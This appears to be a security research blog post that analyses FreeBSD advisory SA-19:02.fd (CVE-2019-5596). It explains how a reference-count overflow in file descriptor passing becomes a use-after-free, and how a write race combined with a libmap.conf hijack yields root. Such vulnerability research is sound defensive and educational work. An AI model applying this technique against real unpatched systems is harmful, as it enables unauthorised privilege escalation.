Exploiting FreeBSD-SA-19:02.fd
Introduction
In February 2019 the FreeBSD project issued an advisory about a possible vulnerability in the handling of file descriptors.
UNIX-like systems such as FreeBSD allow to send file descriptors to other processes via UNIX-domain sockets. This can for example be used to pass file access privileges to the receiving process.
Inside the kernel, file descriptors are used to indirectly reference a C struct
which stores the relevant information about the file object. This could for instance include a reference to a vnode which describes the file for the file system, the file type, or the access privileges.
What really happens if a UNIX-domain socket is used to send a file descriptor to another process is that for the receiving process, inside the kernel a reference to this struct
is created. As the new file descriptor is a reference to the same file object, all information is inherited. For instance, this can allow to give another process write access to a file on the drive even if the process owner is normally not able to open the file writable.
The advisory describes that FreeBSD 12.0 introduced a bug in this mechanism. As the file descriptor information is sent via a socket, the sender and the receiver have to allocate buffers for the procedure. If the receiving buffer is not large enough, the FreeBSD kernel attempts to close the received file descriptors to prevent a leak of these to the sender. However, while the responsible function closes the file descriptor, it fails to release the reference from the file descriptor to the file object. This could cause the reference counter to wrap.
The advisory further states that the impact of this bug is possibly a local privilege escalation to gain root privileges or a jail escape. However, no proof-of-concept was provided by the advisory authors.
This blog post catches up on that and describes Secfault Security’s research to exploit the bug in order to obtain a privilege escalation to root.
In the next section, the bug itself is analyzed to make a statement about the bug class and a guess about a possible exploitation primitive.
After that, the bug trigger is addressed.
It follows a discussion of three imaginable exploitation strategies - including a discussion of why two of these approaches failed.
In the section before last, the working exploit primitive is discussed. It introduces a (at least to the author’s knowledge) new exploitation technique for these kind of vulnerabilities in FreeBSD. The stabilization of the exploit is addressed, too.
The last section wraps everything up in a conclusion and points out further steps and challenges.
Furthermore, there is an appendix, which describes the test setup and kernel patches to accelerate the exploit conditions for testing.
It should be mentioned that the vulnerability was backported to the FreeBSD 11 development branch. However, the vulnerability was fixed in this branch, too, so it will not be present in the 11.3-release.
The issue has an assigned CVE which is CVE-2019-5596.
NB: All references to code lines are referring to the vulnerable source tree which was shipped with the initial FreeBSD 12 release. The source code can be found here if not otherwise mentioned.
All PoC code can be downloaded here.
Bug Analysis
To get a first hint about the origin of the bug, a look into the patch in revision r343790
of the FreeBSD 12 release engineering branch is a good start. This revision was mentioned in the advisory. It can be found in FreeBSD’s Phrabricator instance. The fix from this revision is the following:
1578 void
1579 m_dispose_extcontrolm(struct mbuf *m)
1580 {
...
1606 while (nfd-- > 0) {
1607 fd = *fds++;
1608 error = fget(td, fd, &cap_no_rights,
1609 &fp);
- 1610 if (error == 0)
+ 1610 if (error == 0) {
1611 fdclose(td, fp, fd);
+ 1612 fdrop(fp, td);
+ 1613 }
1614 }
...
1621 }
Only a single call in the function m_dispose_extcontrol()
in the file uipc_syscalls.c
was added. The bug was therefore introduced because the function lacks a call to the macro fdrop()
. So the natural question is: What is the purpose of this macro?
fdrop()
has two arguments, fp
and td
. The latter is just a kernel-pointer to the current thread. The former is a pointer to a struct file
object, which is defined in line 170 of sys/sys/file.h
.
170 struct file {
171 void *f_data; /* file descriptor specific data */
172 struct fileops *f_ops; /* File operations */
173 struct ucred *f_cred; /* associated credentials. */
174 struct vnode *f_vnode; /* NULL or applicable vnode */
175 short f_type; /* descriptor type */
176 short f_vnread_flags; /* (f) Sleep lock for f_offset */
177 volatile u_int f_flag; /* see fcntl.h */
178 volatile u_int f_count; /* reference count */
179 /*
180 * DTYPE_VNODE specific fields.
181 */
182 int f_seqcount; /* (a) Count of sequential accesses. */
183 off_t f_nextoff; /* next expected read/write offset. */
184 union {
185 struct cdev_privdata *fvn_cdevpriv;
186 /* (d) Private data for the cdev. */
187 struct fadvise_info *fvn_advice;
188 } f_vnun;
189 /*
190 * DFLAG_SEEKABLE specific fields
191 */
192 off_t f_offset;
193 /*
194 * Mandatory Access control information.
195 */
196 void *f_label; /* Place-holder for MAC label. */
197 };
fdrop()
itself is a macro, which first calls refcount_release()
. This function atomically decrements f_count
in line 178 of the struct
definition by 1
and returns 1
if f_count
was less or equal to 1
before the function was called, or 0
otherwise. If the return value was 1
indeed, the macro calls _fdrop()
with all its arguments.
_fdrop()
itself is defined in sys/kern/kern_descrip.c
.
2943 int __noinline
2944 _fdrop(struct file *fp, struct thread *td)
2945 {
2946 int error;
2947
2948 if (fp->f_count != 0)
2949 panic("fdrop: count %d", fp->f_count);
2950 error = fo_close(fp, td);
2951 atomic_subtract_int(&openfiles, 1);
2952 crfree(fp->f_cred);
2953 free(fp->f_advice, M_FADVISE);
2954 uma_zfree(file_zone, fp);
2955
2956 return (error);
2957 }
The interesting line is 2954. Here, uma_zfree()
is called. This is an internal kernel function which frees an allocated chunk on the heap. It is beyond the scope of this document to discuss the details of the kernel’s heap management. The inner workings of the kernel allocator are described by argp and karl in Phrack #0x42, Phile #0x08. Another great resource is the book “The Design and Implementation of the FreeBSD Operating System” by McKusick et al.
For the purpose of this blog post, the following knowledge about the kernel heap is sufficient: The FreeBSD kernel’s heap allocator allows to define “zones”. Each zone is used to manage page chunks of a specific size by creating “buckets”. To allocate a chunk on the kernel’s heap, uma_zalloc()
has to be called with parameter which specifies the zone. The function returns a pointer to a chunk which is taken from a bucket of that zone. If the bucket is empty, a new page is allocated for that zone and chopped into the zone’s chunk size.
For example the zone socket
is used to allocate chunks of size 872 Bytes which are used by the kernel to allocate heap space for socket objects. There are anonymous zones, too, like 256
which are used by calls to malloc()
in the kernel.
It is possible to view all available zones including their stats with the command vmstat -z
.
When a heap chunk is freed via uma_zalloc()
by the kernel, it will be put back into the zone’s bucket. Subsequent calls to malloc()
or uma_zalloc()
will attempt to take chunks from such buckets in a LIFO fashion.
For the moment, the interesting insights are:
uma_zfree()
is called withfile_zone
file_zone
refers to a special zone calledFiles
for thestruct file
type- If another function allocates a
struct file
fromFiles
, it will eventually receive the pointer that was freed by_fdrop()
A last observation is the following: fdclose()
does call fdrop()
in line 2384 of its implementation in sys/kern/kern_descrip.c
, too.
2376 fdclose(struct thread *td, struct file *fp, int idx)
2377 {
2378 struct filedesc *fdp = td->td_proc->p_fd;
2379
2380 FILEDESC_XLOCK(fdp);
2381 if (fdp->fd_ofiles[idx].fde_file == fp) {
2382 fdfree(fdp, idx);
2383 FILEDESC_XUNLOCK(fdp);
2384 fdrop(fp, td);
2385 } else
2386 FILEDESC_XUNLOCK(fdp);
2387 }
As the description of the bug mentions the wrapping of a reference counter, one can see that the lack of a second fdrop()
leads to an overflow of the reference counter f_count
in respective struct file
. This could ultimately lead to a use-after-free vulnerability1.
To clarify this, we’ll investigate the exact purpose of m_dispose_extcontrolm()
and the vulnerable path.
The Vulnerable Path
m_dispose_extcontrolm()
was introduced for a single purpose as is described here: It is possible to send file descriptors via a UNIX-domain socket. This is done by the function sendmsg()
, which allows to put so-called control data into the message2. File descriptors are sent by using the control message type SCM_RIGHTS
.
However, it was observed quite a while ago that file descriptors do leak if the receiver’s buffer is too small. The bug entry’s comments state that in the case of a not big enough receiving buffer, the receiving process has to close the already opened file descriptors, due to the fact that not all descriptors are received. However, as the already received file descriptors are processed and the references to the file objects are created (as mentioned in the introduction), these file descriptors are leaked if the close does not happen.
Therefore, the new function m_dispose_extcontrol()
was introduced to resolve this issue. Reviewing line 998 ff. of kern_recvit()
in sys/kern/uipc_syscalls.c
shows the call in line 1033.
902 int
903 kern_recvit(struct thread *td, int s, struct msghdr *mp, enum uio_seg fromseg,
904 struct mbuf **controlp)
905 {
...
998 if (mp->msg_control && controlp == NULL) {
999 #ifdef COMPAT_OLDSOCK
...
1018 #endif
1019 ctlbuf = mp->msg_control;
1020 len = mp->msg_controllen;
1021 mp->msg_controllen = 0;
1022 for (m = control; m != NULL && len >= m->m_len; m = m->m_next) {
1023 if ((error = copyout(mtod(m, caddr_t), ctlbuf,
1024 m->m_len)) != 0)
1025 goto out;
1026
1027 ctlbuf += m->m_len;
1028 len -= m->m_len;
1029 mp->msg_controllen += m->m_len;
1030 }
1031 if (m != NULL) {
1032 mp->msg_flags |= MSG_CTRUNC;
1033 m_dispose_extcontrolm(m);
1034 }
1035 }
Ultimately, this path is followed if a message containing file descriptors in the control part is sent, but the recvmsg()
used to receive this message does not expect any control messages at all. This will trigger m_dispose_controlm()
, as len
in line 1020 will be 0
but m->m_len
will be bigger. Hence, the loop in line 1022 is not executed but m
is assigned to something different from NULL
because there is a control message in the sent message.
That is, to call m_dispose_constrolm()
, the following has to be done:
- Create a UNIX-domain socket
- Allocate a buffer which is big enough to send a message via the socket with a contained file descriptor
- Allocate a buffer which is not big enough to receive a message via the socket which contains a file descriptor
- Send the message with
sendmsg()
- Receive the message with
recvmsg()
Now, the bug itself can be reviewed. For this, line 1606 ff. of m_dispose_extcontrolm()
has to be taken into view again.
1578 void
1579 m_dispose_extcontrolm(struct mbuf *m)
1580 {
...
1606 while (nfd-- > 0) {
1607 fd = *fds++;
1608 error = fget(td, fd, &cap_no_rights,
1609 &fp);
1610 if (error == 0)
1611 fdclose(td, fp, fd);
1612 }
The interesting part is the call to fget()
. This function eventually results in a call to fget_unlocked()
, which extracts the pointer to a struct file
object from the file descriptor fd
, saves the address in the pointer fp
and increments the reference counter f_count
of the struct file
object by 1
. However, sending a file descriptor already increases the reference counter because the receiver holds with its own file descriptor a reference to the same struct file
object. In total, the reference counter is therefore increased by 2
.
In the end, fdclose()
in line 1611 closes the receiver’s file descriptor and therefore removes a reference to the struct, but does not take into account that f_count
was increased by 2
in total due to the call to fget()
.
Therefore, the function results in a primitive that can increase f_count
by 1
. Because f_count
is of the type u_int
, which has a size of 32 bit, an overflow of this variable is possible in a reasonable time. This is done by just iterating the primitive to increase f_count
until the result would need more than 32 bit to represent it in memory. Therefore all bits higher than the 32th bit are removed and the variable wraps back to 0
again.
If this is used to overflow f_count
to 1
, then it is possible to create a use-after-free scenario. To achieve this, the sending process needs to hold two file descriptors to the same struct file
, which can be done by duplicating one file descriptor with dup()
. Now, if one of the file descriptors is closed after the overflow, fdrop()
is called. As this call will only see that f_count
is 1
, the struct file
object will be freed as explained above. However, it is still possible to reference the freed chunk via the second, still opened file descriptor.
Now that the general idea is clarified and because this part is so important, it should be described in more detail how to trigger the vulnerability as there are some wrinkles to address.
First, a file is opened with open()
and the file descriptor is duplicated with dup()
. This results in two file descriptors, which reference the same struct file
object. Hence, f_count
is 2
.
Next, m_dispose_extcontrolm()
is triggered, as described above, repeatedly to overflow f_count
to finally set it to 1
again. This has some quirks, though. On the one hand, it is not possible send an arbitrary amount of file descriptors. This is the case because each file descriptor will need some space in the message to send but the kernel internally only has a limited amount of so-called mbufs
available, which build up the message for further processing.
Luckily enough, sending the file descriptor more than once via the socket will increase the reference counter multiple times before m_dispose_extcontrolm()
is called to decrement the counter.
Due to this, the preparation of the use-after-free needs some time. For a virtual machines used for this research, this was around 20 minutes3.
Moreover, it is important to note that the overflow has to result in f_count == 1
and not 0
, because if fdrop()
is called with f_count == 0
it will result in a kernel panic. This is because refcount_release()
only checks if the decremented counter is 0
or less to signal the free but _fdrop()
asserts that f_count
is exactly 0
. If the counter is negative, _fdrop()
triggers the panic4.
After wrapping f_count
to the value 1
, one of the file descriptors is “manually” closed. This will trigger the free because f_count
will decrement to 0
, thus _fdrop()
is called. The result is that the struct file
object is released to the Files
zone’s bucket. Due to the former dup()
the second file descriptor still references the freed struct file
object but is now invalid as the object itself is marked as invalid.
Here is another quirk: Other syscalls like read()
or write()
which use a struct file
will result in a call to fget_unlocked()
. This function will check that the used file descriptor is not greater than the greatest valid one, though. Therefore, the first file descriptor has to be closed because the duplicated one is typically greater.
So far we have obtained a file descriptor that references an invalid struct file
. Once the memory of this struct file
is re-used by another call to open()
, our “dangling” file descriptor will actually become valid again. However, it will then point to the newly opened file. The dangling file descriptor can be used for the same operations as the newly opened one. Because they share the same struct file
all rights of the newly opened file descriptor are inherited by the dangling one. E.g., if the first file was opened read-only but the second one writable, the dangling file descriptor can be used to write to the newly opened file.
How this could be exploited will be described in the next section and the one after that.
To sum the trigger strategy up:
- Open a file with
open()
- Duplicate the file descriptor with
dup()
- Overflow
f_count
to1
by callingm_dispose_extcontrol()
- Close the first file descriptor to trigger the free
- Call
open()
again to allocate anotherstruct file
from theFiles
zone, resulting in a dangling file descriptor to that object
A first proof-of-concept can be found in trigger_uaf.c
. It is notable that it will result in a kernel panic when the program is closed. This will be addressed in the final exploit. The interested reader can try to figure out the solution before continuing the read.
Exploitation Strategies
This section will discuss three possible exploitation strategies, two of which failed during the research.
Utilizing a suid Program
One of the simplest strategies is the following: Is it possible to trigger the use-after-free and executing some suid
program like passwd
after that, resulting into a dangling file descriptor to a file owned by root including all capabilities?
An exploit would need to place the struct file
object exactly into the Files
zone bucket where needed. If the suid
program opens a file owned by root like master.passwd
or libmap.conf
writable, it could be possible to write to this file from the user context.
In theory this strategy works. A proof-of-concept can be found in the files setuid_test_client.c
and setuid_test_server.c
(NB: The compiled setuid_test_server.c
has to be root-owned and suid, of course).
However, finding such a program turned out to be trickier than expected. Most utilities in the standard installation open interesting files read-only or close them too fast.
Therefore this approach was dropped early.
Memory Corruption
Another typical approach would be to find some way for corrupting the kernel’s memory in order to simply execute user-provided code. This could mean to overwrite, e.g., a function pointer inside the struct file
object or another object which could be indirectly referenced by the struct file
object.
Indeed, fail0verflow used a very similar technique to exploit a vulnerability in the PlayStation 4 operating system, which is based on FreeBSD 9. They opened a kqueue
, which is a FreeBSD mechanism to monitor kernel events.
kqueue-files utilize the f_data
pointer of struct file
to manage the kqueue. The heap space is allocated from one of the anonymous zones. Therefore it is possible to spray into that zone via ioctl()
and overwrite a function pointer as described in the blog post.
There is a significant difference between the vulnerability used by fail0verflow and the one researched in this work, though: The former allowed an arbitrary free, e.g., of the f_data
pointer. The latter only allows to free a struct file
. As the kernel cleans up all interesting struct fields and pointers, it is not possible to use fail0verflow’s primitives.
During the research all other possible objects which rely on struct file
were investigated, but none allowed to exploit the vulnerability via a memory corruption due to the just described reason.
Exchange the File Object During write()
This is a variation of our first strategy.
The FreeBSD kernel checks if a file is opened writable as soon as a user tries to write via a file descriptor. If the check if passed, the write operation is prepared and executed. This creates basically a Time-of-Check-Time-of-Use (TOCTOU) scenario.
The idea is the following: The time window between the passed check and the write operation itself creates a race condition. It should be possible to free the struct file
object via the described vulnerability and immediately open another file which is normally read-only for the user. Because the write-check is already done, the write operation will be executed but happen on the read-only file because the struct file
was exchanged.
As this strategy was finally successfully used to exploit the use-after-free to gain root access, it is described in detail in the next section.
It should be mentioned that Jann Horn of Google’s Project Zero exploited a similar vulnerability in Linux and used a similar approach. This is described in a posting from 2016 on the Project Zero bug tracker.
Escalate to root
As described in the last section, the strategy is basically a Time-of-Check-Time-of-Use (TOCTOU) attack: write()
is called for a file which is writable by the user. The syscall will first check if the file referenced by the file descriptor is indeed writable by the user or result in an error otherwise. After the check is passed, the use-after-free vulnerability is triggered and a root-owned read-only file is opened by the user right after that.
The check works the following way: the write()
syscall results in a call of the kernel function sys_write()
in sys/kern/sys_generic.c
. Subsequently, kern_writev()
in the same file is called, which then calls fget_write()
. The latter is defined in sys/kern/kern_descrip.c
. This function is used to retrieve the struct file
object for the file descriptor and checks for write capability.
To do this, the function calls _fget()
in the same file.
2716 static __inline int
2717 _fget(struct thread *td, int fd, struct file **fpp, int flags,
2718 cap_rights_t *needrightsp, seq_t *seqp)
2719 {
2720 struct filedesc *fdp;
2721 struct file *fp;
2722 int error;
2723
2724 *fpp = NULL;
2725 fdp = td->td_proc->p_fd;
2726 error = fget_unlocked(fdp, fd, needrightsp, &fp, seqp);
...
2738 switch (flags) {
2739 case FREAD:
2740 case FWRITE:
2741 if ((fp->f_flag & flags) == 0)
2742 error = EBADF;
2743 break;
...
2753 }
2754
2755 if (error != 0) {
2756 fdrop(fp, td);
2757 return (error);
2758 }
2759
2760 *fpp = fp;
2761 return (0);
2762 }
The check can be seen in line 2741. f_flag
is a field in struct file
, set by the first call to open()
for the file. A call to write()
will result in a check for the FWRITE
bit set. Therefore, the bit is only set if the user has write privileges for the opened file.
The following should be noted: If it is assumed that the use-after-free is already prepared at that moment, that is, the f_count
variable was overflowed to 1
, the call to fget_unlocked()
does increase f_count
to 2
. The counter will be decreased to 1
again at the end of the write()
operation.
However, if the check is successfully passed, it is possible to exchange the file object via the use-after-free plus another call to open()
to a read-only file. The write will then happen to the second file. A first proof-of-concept can be found in test_rd_only_write.c
(note that a kernel patch is needed for that test as noted in the comment at the beginning of the file; see the appendix for more information).
After the check is passed, kern_writev()
will call dofilewrite()
in the same file.
545 static int
546 dofilewrite(struct thread *td, int fd, struct file *fp, struct uio *auio,
547 off_t offset, int flags)
548 {
...
564 if (fp->f_type == DTYPE_VNODE &&
565 (fp->f_vnread_flags & FDEVFS_VNODE) == 0)
566 bwillwrite();
567 if ((error = fo_write(fp, auio, td->td_ucred, flags, td))) {
...
576 }
577 }
...
587 }
This function has two interesting function calls. This first one is to fo_write()
in line 567. This function will eventually result in the write operation. That is, it is safe to assume that the file exchange has to happen before this function is called5.
This race is quite tight, though, and not likely to win without any other primitive. Moreover, the race has to be won at the first try because otherwise the kernel will panic.
This is the case because it is assumed, as mentioned above, that f_count
is 2
at the moment of the passed check. Therefore, close()
has to be called twice. But if the check is not yet passed or write()
has already finished, f_count
is still 1
. _fdrop()
will assert that the reference counter is exactly 0
, though, but two closes would result in a negative reference counter because the function interprets the counter as a signed integer. The panic would be the result of the failed assertion.
Jann Horn could delay the Linux kernel operations by writing a FUSE file system which delays write operations to increase the success rate to win this race condition. This is not possible in a standard FreeBSD installation because FUSE cannot be assumed to be loaded (and to be available to the respective user).
Here, the call to bwillwrite()
in line 566 comes to help. This function and the function buf_dirty_count_severe()
are defined in sys/kern/vfs_bio.c
.
2564 bwillwrite(void)
2565 {
2566
2567 if (buf_dirty_count_severe()) {
2568 mtx_lock(&bdirtylock);
2569 while (buf_dirty_count_severe()) {
2570 bdirtywait = 1;
2571 msleep(&bdirtywait, &bdirtylock, (PRIBIO + 4),
2572 "flswai", 0);
2573 }
2574 mtx_unlock(&bdirtylock);
2575 }
2576 }
2577
2578 /*
2579 * Return true if we have too many dirty buffers.
2580 */
2581 int
2582 buf_dirty_count_severe(void)
2583 {
2584
2585 return (!BIT_EMPTY(BUF_DOMAINS, &bdhidirty));
2586 }
The line that directly strikes the eye is line 2571, which calls msleep()
. As can be read in the man page of that function6, this will put the thread to sleep without a timeout. A check of the wakeup channel bdirtywait
shows that the thread will be woken up by bdirtywakeup()
, which itself is called by buf_daemon()
from vfs_bio.c
.
The condition for the call to msleep()
and the purpose of buf_daemon()
are connected: If the kernel holds too many dirty buffers (i.e., buffers that are waiting for their write operation), buf_dirty_count_severe()
returns 1
and buf_daemon()
is woken up to flush these in order to reduce the count. After that, bdirtywakeup()
is called to wake up all write operations that are waiting at line 2571.
There are two kernel variables used as a water mark to monitor if there are two many dirty buffers: lodirtybuffers
and hidirtybuffers
. These are set at boot time and depend on the available RAM7. If the number of dirty buffers is greater than hidirtybuffers
, the bit bdhidirty
(line 2585) is set and buf_dirty_count_severe
returns 1
, thus resulting in the msleep()
call.
Therefore a technique is needed to raise the number of dirty buffers fast. After some experimenting, an easy way was quickly identified: The exploit needs to open a vast amount of file streams, which all reference to the same file. However, after a file stream is opened with fopen()
, the corresponding file is unlinked before the next call to fopen()
. The number of dirty buffers will increase if the exploit attempts to write to all these file streams in parallel.
A demo for this technique can be found in test_dirty.c
.
The exploit now works as follows: Once the number of dirty buffers is high enough, another thread gets a signal to attempt the write to a previously opened, random file writable by the user. Simultaneously, a signal to yet another thread is given to trigger the use-after-free and open a file that is read-only for the user. The use-after-free is triggered by closing both, the file descriptor used to prepare the user-after-free scenario and the duplicated one (remember that f_count
equals 2
now). Opening the read-only file now will result into the exchange of the struct file
object.
To increase the chance that the race is won by the exploit, the use-after-free trigger thread and the write-thread run on different cores, if possible, and the use-after-free is delayed by some microseconds. If the latter is not done, the exploit will likely result in a kernel panic because the use-after-free happens too fast and thus resulting in the panic triggered by _fdrop()
as described above.
A proof-of-concept for the arbitrary write can be found in arbitary_file_write
. It should be noted that the hammer
threads are synchronized. Otherwise the resulting load of “hammering”, still creating threads and triggering the vulnerability renders an unreliable exploit. Moreover, a synchronous write triggers the msleep()
condition much faster.
There are still two challenges open for the final exploit: Gaining root and preventing the kernel panic.
The latter can be achieved by using the primitive which resulted in the reference counter overflow. The reason for the panic is, that the program attempts to close all file descriptors it assumes open. Due to the use-after-free the reference counter is to small, though. Hence, the former mentioned assertion in _fdrop()
fails.
Because f_count
of the exploited struct file
is 1
at the time of the write operation due to the use-after-free and the following open()
, write()
will free the file object again because it calls fdrop()
at the end. It is therefore needed, to call open()
a third time, to get a file descriptor to the corrupt struct file
. After that, the reference counter increase primitive can be used to increase f_count
, which will prevent the kernel panic.
The privilege escalation is now a piece of cake thanks to a technique used by kingcope, who published a FreeBSD root exploit in 2005, which writes to the file /etc/libmap.conf
. This configuration file can be used to hook the loading of dynamic libraries if a program is started. The exploit therefore creates a dynamic library, which copies /bin/sh
to another file and sets the suid
-bit for the copy. The hooked library is libutil
, which is for instance called by su
. Therefore, a call to su
by the user will afterwards result in a suid
copy of /bin/sh
.
The final exploit can be found in heavy_cyber_weapon.sh
8.
Conclusion and Further Steps
The past blog post showed the exploitation of a simple yet easy to overlook vulnerability in FreeBSD.
While the use-after-free trigger was quite simple to develop, the research to find a way to exploit the vulnerability needed a lot more effort. The main reason for this seems to be the reasonable good engineering of the kernel code and the scarce landscape of write-ups for FreeBSD vulnerabilities. The author hopes that this blog post does contribute well to the latter or does help at least another neighbor during their own research.
To the best knowledge of the author, this blog post is the first to describe a working exploit for this vulnerability and the first that describes the needed technique for that.
The exploitation technique itself should come handy in similar situations, which trigger a use-after-free on the Files
zone as well. Without major changes on the kernel code, it should remain.
Moreover, the elegance of logic exploits comes to shine, when using this exploit without modifications on other installations and even other CPU architectures. E.g., the exploit was successfully tested on an ARM processor.
At the end, some further steps should be mentioned:
- At the moment the exploit technique only works for UFS. While this was the standard file system in the past, nowadays ZFS is widely adopted for FreeBSD installations. However, the technique does not work with ZFS, because the dirty buffer mechanism seems to work different (if it exists at all). Therefore,
msleep()
is not triggered, which renders the race condition unreliable. The chances are high that another delay mechanism has to be found. - The code to render the race condition reliable via doing a lot of parallel writes to create dirty buffers seems inelegant. Maybe there is another way to create a write delay but this was the quickest way to do it.
- Last but not least, there are maybe completely different ways to exploit the vulnerability. For example, one could think about tricking a
suid
program to read from a file it does not intend to read from (such as, trickingsu
into reading from a user-provided file instead of from/etc/pam.d/su
).
Appendix: Test Setup
To test and debug the exploit and bugs, a setup with VirtualBox was chosen. Moreover, some kernel patches can be applied to accelerate the preparation of the use-after-free condition.
VirtualBox Setup
There are already some guides to create a test setup for FreeBSD kernel debugging, e.g., by argp.
This is a current update for these guides and explains the setup step-by-step.
- Get the FreeBSD-12-RELEASE disc1 from here
- Install everything into a new VirtualBox VM
- Use UFS
- Do not apply any hardening for the moment
- Install sources (/usr/src), SSH and debug features
- Reboot after installation, do not forget to ‘eject’ the disc image
- Configure SSH, users etc.
- Install gdb with pkg:
pkg install gdb
- Compile a custom kernel the following way
cd /usr/src/sys/amd64/conf
- Create a new file called
DEBUG
and add the following contents
include GENERIC
ident DEBUG
makeoptions DEBUG=-g
options DDB
options GDB
options KDB
- Create
/etc/make.conf
withCFLAGS=-pipe -O0
for the content - Change all
-O2
to-O0
in/usr/src/sys/conf/kern.pre.mk
- Execute
cd /usr/src
- Execute
make buildkernel -j8 KERNCONF=DEBUG
- Execute
make installkernel KERNCONF=DEBUG
- Execute
reboot
- Execute
sysctl debug.kdb.enter=1
to check if it is possible to enter debug mode
- Note that the debugger starts in the VM window and not the SSH session
- Clone the machine, use expert mode to create a linked clone and just leave the rest
- The clone is the target, while the original is the debugger host
- For the target, activate in the VM settings the serial port COM1 as a host pipe
- Do not check the box for the connection to a pipe
- Path could be
/tmp/fbsdpipe
- Do the same for the debugger
- Check the box for the connection to a pipe, use the same path as for the target
- Boot the target first
- Change the hostname if wanted
- Change
hint.uart.0.flags
to0x90
in/boot/device.hints
- Reboot the target
- Boot the debugger
- Change to debug mode in the target and execute
gdb
in the debugger session - In the debugger execute:
cd /usr/obj/usr/src/amd64.amd64/sys/DEBUG
kgdb -b 38400 kernel.debug
kgdb> target remote /dev/cuau0
- A debugger session for the target in
kgdb
should be seen
Kernel Patches
To ease the exploit testing and to prevent to wait a long time span for each run, a patch in m_dispose_extcontrolm()
is a possible solution. The following line needs to be added to the end of the function:
1618 }
1619 if (fp->f_count == 1234) fp->f_count = 0xfffffff2;
1620 }
This approach also needs to replace the for
-loop in all code files which prepares the use-after-free with the following one (basically reducing the upper limit for i
and just sending one file descriptor at a time):
for (i = 0; i < 1232; i++)
send_recv(fd, sv, 0x1);
During the research, another kernel patch was used to create a very long delay after bwillwrite()
was called. Add the following if
-condition after the function call in sys/kern/sys_generic.c
:
564 if (fp->f_type == DTYPE_VNODE &&
565 (fp->f_vnread_flags & FDEVFS_VNODE) == 0) {
566 bwillwrite();
567 if (fd == 16000)
568 pause("", 100);
569 }
This needs to alter the call to open()
in order to open a temporary file in all code files to the following:
do {
if ((fd = open_tmp()) == -1) {
perror("open_tmp");
exit(1);
}
} while(fd != 16000);
The last kernel patch used is needed for test_rd_only_write.c
. In sys/kern/sys_generic.
the following patch is needed in the function kern_writev()
after fget_write()
is called:
491 if (fd == 22)
492 __asm__("int3");
This results in a break point to allow the exchange of the struct file
object as described in the top comment of that proof-of-concept.
See, e.g., https://ruxcon.org.au/assets/2016/slides/ruxcon2016-Vitaly.pdf by Vitaly Nikolenko for an example of similar bugs↩
Refer to man page unix(4) for details↩
With 2 GB of RAM and 2 cores of a modern Intel Notebook CPU.↩
One could use this behaviour as a first proof of concept by increasing the reference counter to 0xffffffff = -1 (two’s complement…) because before the decrement to 0xffffffff,
f_count
will be 0.↩Or latter in the subsequent function calls inside
fo_write()
but this is not needed.↩sleep(9)↩
Call
sysctl vfs.hidirtybuffers
andsysctl vfs.lodirtybuffers
to show the value for the specific system.↩Constant numbers of forks, threads and files may need adjustment for other test systems. The numbers presented in this exploit are for a VM with 2 GB RAM and 2 cores on a modern Intel notebook CPU.↩